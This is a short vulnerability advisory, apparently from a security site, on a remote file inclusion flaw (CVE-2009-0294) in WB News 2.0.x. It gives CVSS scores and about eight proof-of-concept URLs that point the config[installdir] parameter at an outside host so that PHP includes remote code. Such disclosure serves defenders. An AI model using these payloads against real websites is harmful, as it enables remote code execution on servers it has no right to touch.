WB News v2.0.X Remote File include ..

2009.01.30
Credit: HACKERS PAL
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-0294
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hello WB News v2.0.X Remote File include .. tested on 2.0.1 Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] search.php?config[installdir]=http://www.soqor.net/index/? archive.php?config[installdir]=http://www.soqor.net/index/? comments.php?config[installdir]=http://www.soqor.net/index/? news.php?config[installdir]=http://www.soqor.net/index/? base/News.php?config[installdir]=http://www.soqor.net/index/? base/SendFriend.php?config[installdir]=http://www.soqor.net/index/? base/Archive.php?config[installdir]=http://www.soqor.net/index/? base/Comments.php?config[installdir]=http://www.soqor.net/index/? ... etc #WwW.SoQoR.NeT ------------------------------------------------------------------------ -------- HACKERS PAL The Palestinian Hacker Security (at) SoQoR (dot) NeT [email concealed] WwW.SoQoR.NeT


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top